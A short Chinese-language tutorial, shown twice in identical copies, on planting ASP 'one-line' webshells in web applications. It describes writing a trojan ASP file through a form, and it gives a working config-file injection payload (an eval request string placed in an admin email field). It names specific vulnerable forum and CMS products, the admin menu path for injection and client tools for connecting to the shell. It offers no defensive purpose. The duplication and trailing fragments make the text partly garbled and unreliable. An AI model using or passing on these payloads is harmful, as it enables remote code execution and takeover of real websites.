這裡透過提交表單的方式,將木馬提交上去,具體的做法是將定義一個物件IP,然後以文字方式寫入newvalue裡面的內容(newvalue的內容在textarea定義),寫入以覆蓋的方式產生ASP檔案,然後執行這個指令碼。其中客戶端中的value代表的是表單的名字,必須跟服務端(本機)的post提交中的表單名一樣,所以這裡的value可以為任意字元,相當於一個密碼之類的東西,但是這個‘密碼’是明文的,可以擷取下來。擴充套件資料:寫webshell的方法利用"""":""//"等符號構造最小馬寫入程式的配置檔案,joekoe論壇,某某同學錄,沸騰展望新聞系統,COCOON Counter統計程式等等,還有很多php程式都可以。舉例,在管理郵箱處添上cnhacker@263.net":eval request(chr (35))//, 在配製檔案中就是webmail="cnhacker@263.net\":eval request(chr(35))//",還有一種方法就是寫上 cnhacker@263.net"%>可以用lake2的eval傳送端以及最新的2006 客戶端來連,需要說明的是資料庫插馬時候要選前者。再如動易2005,到文章中心管理-頂部選單設定-選單其它特效,插入一句話 馬"%>
這裡透過提交表單的方式,將木馬提交上去,具體的做法是將定義一個物件IP,然後以文字方式寫入newvalue裡面的內容(newvalue的內容在textarea定義),寫入以覆蓋的方式產生ASP檔案,然後執行這個指令碼。其中客戶端中的value代表的是表單的名字,必須跟服務端(本機)的post提交中的表單名一樣,所以這裡的value可以為任意字元,相當於一個密碼之類的東西,但是這個‘密碼’是明文的,可以擷取下來。擴充套件資料:寫webshell的方法利用"""":""//"等符號構造最小馬寫入程式的配置檔案,joekoe論壇,某某同學錄,沸騰展望新聞系統,COCOON Counter統計程式等等,還有很多php程式都可以。舉例,在管理郵箱處添上cnhacker@263.net":eval request(chr (35))//, 在配製檔案中就是webmail="cnhacker@263.net\":eval request(chr(35))//",還有一種方法就是寫上 cnhacker@263.net"%>可以用lake2的eval傳送端以及最新的2006 客戶端來連,需要說明的是資料庫插馬時候要選前者。再如動易2005,到文章中心管理-頂部選單設定-選單其它特效,插入一句話 馬"%>